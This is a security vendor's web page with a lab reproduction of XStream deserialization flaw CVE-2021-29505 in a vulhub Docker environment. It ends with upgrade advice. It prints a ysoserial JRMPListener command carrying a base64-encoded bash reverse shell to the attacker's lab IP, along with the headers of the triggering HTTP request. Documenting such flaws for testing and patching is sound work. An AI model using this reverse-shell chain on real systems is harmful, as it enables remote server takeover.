数字医学与健康大会DMHC——美创与您相约古都金陵
2025-08-12
美创科技打造县域医疗灾备新标杆|神木市医院 HIS 系统数据库分钟级切换演练实录
2025-07-02
百万罚单警示!DCAS助力金融机构筑牢数据安全防线,实现监管合规
2025-06-20
2025中国互联网产业年会丨《中国互联网产业绿色算力发展倡议》正式发布
2025-02-07
美创用户专访 | 精细化管理:医疗行业数据分类分级的策略与实践
2025-01-10
存储域
数据库加密 诺亚防勒索访问域
数据库防水坝 数据库防火墙 数据库安全审计 动态脱敏流动域
静态脱敏 数据水印 API审计 API防控 医疗防统方运维服务
数据库运维服务 中间件运维服务 国产信创改造服务 驻场运维服务 供数服务安全咨询服务
数据出境安全治理服务 数据安全能力评估认证服务 数据安全风险评估服务 数据安全治理咨询服务 数据分类分级咨询服务 个人信息风险评估服务 数据安全检查服务XStream是一个常用的Java对象和XML相互转换的工具,攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成反序列化代码执行漏洞。该漏洞允许远程攻击者直接获取服务器权限。
漏洞编号
CVE-2021-29505
影响范围
xStream <= 1.4.16
环境搭建
1. 使用vulhub进行漏洞环境搭建
https://raw.githubusercontent.com/vulhub/vulhub/master/xstream/CVE-2021-29505/docker-compose.yml
2.执行如下命令启动镜像环境
docker-compose up -d
图片
3. 访问地址:http://192.168.166.133:8080/
图片
漏洞复现
攻击机ip:192.168.166.131
靶机ip:192.168.166.133
1.在攻击机上使用ysoserial的JRMPListener启动一个恶意的RMI Registry(工具下载地址:https://github.com/frohoff/ysoserial)。其中的bash命令需要进行bash64编码。
图片
2.Bash64编码后的反弹shell命令如下
java -cp ysoserial-master.jarysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c{echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xNjYuMTMxLzIzMzMzIDA+JjE=}|{base64,-d}|{bash,-i}"
3.执行过程如下
图片
4.执行如下数据包
POST / HTTP/1.1
Host:192.168.166.133:8080
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection:keep-alive
Upgrade-Insecure-Requests:1
Content-Type:application/xml
Content-Length:3119
图片
5. 获取反弹shell
图片
修复建议
升级XStream到1.4.17版本及以上版本。